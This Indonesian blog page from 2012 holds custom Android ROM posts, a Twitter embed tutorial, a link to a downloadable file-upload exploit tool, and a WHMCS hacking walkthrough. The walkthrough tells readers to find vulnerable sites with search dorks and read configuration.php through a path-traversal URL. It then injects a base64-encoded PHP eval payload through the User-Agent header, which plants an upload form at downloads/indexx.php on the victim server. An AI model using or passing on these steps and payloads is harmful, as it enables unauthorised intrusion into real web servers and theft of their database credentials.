Kamis, 16 Agustus 2012

Castum Rom S3POP V1.0 For Galaxy Pop Plus (GT S5570I)

Welcome to S3POP Rom

SS:

What's S3POP Feature?
Basic Feature:
  • Root (SU Access)
  • Deodex
  • ZipAligned
Other Feature:
  • Deodexed all system apks
  • Init.d script support
  • SIII Themed
  • New audio boster bass just using DSPmanager without using tweak audio or other audio installer
  • MIUI FIle Manager
  • S3POP Wallpaper
  • SIII Live wallpaper
  • Transparent Walkman music player
  • Ics statusbar
  • Transparent backgrounds for settings
  • Transparent lockscreen
Beast Feature:
  • Creed Parts
  • RepencisLab (Not all feature)
  • A2sd Darktremor support
  • CRT like lockscreen exit animation
  • Status Bar Mods (Use EDT app)
  • New kernel builded
  • Adding 16 CPU Governor
  • Adding 5 i/o schudler
  • Swap support
  • Droidwall support
  • Many more....

Download Link:

Instructions installation:
  • Not Very Hard
  • Download the Rom zip File
  • Copy it to Sdcard Directly
  • Power Off the Phone
  • Boot into recovery by pressing (Vol. Key Up + Home Key + Power Key)
  • Wipe Data and Cache Reset
  • Select CWM_Update ( http://www.mediafire.com/?qlmr41y55xkgyfk )
  • Select Install Zip From SdCard
  • Choose the rom zipInstall
  • Reboot your phone!!!!
  • Booting time maybe 10-15 minutes..

For Expert User (Installation Kernel):
Instructions:

Senin, 13 Agustus 2012

Rom Port Repencis V3.5 For Galaxy Pop Plus (GT-S5570I)

Sebelumnya saya ucapkan terimakasih buat para developer Custom Rom Repencis ini. Custom Rom ini keren banget tampilannya n smoot banget..
Sumber Source http://forum.xda-developers.com/showthread.php?t=1729220 (Rom asli dari gan Fedy untuk galpop+ bisa lihat di sini)
Catatan: Resiko di tanggung sendiri...
Main Features:
  • Rooted
  • Deodexed all system apks
  • Based Rom DXLC1
  • Arabic font plugin
  • Zipalign all apks on boot
  • Init.d script support
  • A2sd Darktremor / Amarul a2sdx support
  • Adw Launcher Ex as default launcher
  • ICS Iconized with green default style
  • New application location management setting
  • New about rom setting like miui
  • Navigation button bar (Trial Version)
  • EDT Tweak + Battery bar + 13 toggle on status bar
  • adding animation on statusbar
  • New audio boster bass just using DSPmanager without using tweak audo or other audio installer
  • new animation transtition
  • AOSP Lockscreen and Milocker app
  • New Repencis Labs merge sparepart and quickpanel
  • - System Replacer to change any system file
  • - Anti Bootloop to make flashable zip file
  • - Startup manager to manage on boot apps
  • - Media scanner to rescan system/sdcard database
  • - Bang samsul code to see samsul secret code
  • - DCSMS Customizoid to customize carrier, icon system, main background, theme switcher
  • And many more......
Performance:
  • New kernel buildedI
  • Adding 17 CPU Governer
  • Adding 5 i/o schudler
  • Swap support

Selasa, 03 Juli 2012

Cara share twitter ke website

Langsung aja :

  1. Pertama buka Twitter agan-agan
  2. Klik twitter agan jadi seperti ini




    3. Klik perincian ..
    4. Terus klik letakan twit ini 


   5. Terus muncul kode embed nya.. copas wee di website kalian





contoh :



sekian aja deh.. pusing ini teh mau posting apa,, ya udah posting ini aja ^_^

Advanced MP3 Player Infusion Arbitrary File Upload - Syndrom2211 edition

Langsung aja akh, ga usah lama-lama ..
cekidot :





Download 8MB :
www.ziddu.com/download/19797486/ArbitraryFileUpload.rar.html

Thanks to Syndrom2211

update : oh iyaa bagi yang ada eror di cmd nya sepeti ini .........curl....... bla bla bla saya lupa lagi ..
langsung aja pergi ke C: - XAMPP - PHP - pilih PHP.ini - open whit notepad terus cari (ctrl+f) ;extension=php_curl.dll hapus titik koma nya jadi seperi ini extension=php_curl.dll sesudah ini save .. dan coba lagi pasti berhasil :)

Sabtu, 30 Juni 2012

WHMCS Exploit with LFI


Ada yang tau apa itu LFI ??
kalo yg belum saya akan menjelaskan sedikit apa itu LFI .
LFI a.k.a Local File Inclusion adalah sebuah bug dimana kita bisa mengexploitnya hanya dengan melalui URL, dan memanfaatkan segala cara untuk bisa mengakses Web tersebut.
Oke langsung saja ke POCnya :

1. Biasalah cari target dengan dork, dorknya sama kaya yang submitticket hanya rubah ja nanti dengan exploitnya.

2. Misalnya saya punya target yang sudah Vuln :


Di atas kita hanya memanfaatkan memalui cart.php atau bisa juga dengan yg lain nya , yg memiliki kerentanan.

3. Kemudian masukkan exploit LFI :

cart.php?a=syndrom&templatefile=../../../configuration.php

Sehingga misalnya kita contohkan seperti ini, :


4. Liat Source Web tersebut dengan menekan Ctrl+u , scroll kebawah dan lihat disana ada configuration webnya :D. asikk
Bagaimana cara mengkonekan nya :/

5.Ada beberapa cara untuk mengkonekan Configuration tersebut :
- Menggunakan ftp
- Menggunakan navicat for mysql
- Filezilla
- Menggunakan armitage ( bila anda menggunakan backtrack / blackbuntu ).

Anda tidak bisa mengkonekan sembarangan dengan port default, tentunya kita harus mengetahui port yang terbuka terlebih dahulu, untuk bisa mengakses semua Filenya, ada beberapa cara juga untuk mengecek portnya, diantaranya bisa menggunakan nmap bisa juga memakai port scanner yg ada di shell :D.

Ada Cara kedua selain mengkonekan dengan cara tersebut.
Caranya dengan menggunakan tamper data.

1. Install Dulu addons tamper data yg ada di mozilla
2. Setelah di install , kita cek /etc/passwdnya :


Kalo muncul , otomatis /proc/self/environ nya pun muncul, kita lihat muncul tidak :


3. Kemudian buka tamper lalu refresh , Klik tamper.. jangan Submit ataupun Cancel pastinya ;)
Disitu ada kolom User Agent, hapus tulisan yang Mozilla blablabla lalu ganti dengan :

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigiZG93bmxvYWRzL2luZGV4eC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTs=')) ;{/php})

Lalu ok, setelah proses tamper selsai, lalu kita cek apakah muncul tempat upload ??


/downloads/indexx.php << adalah path yang ada di exploit tersebut. ;)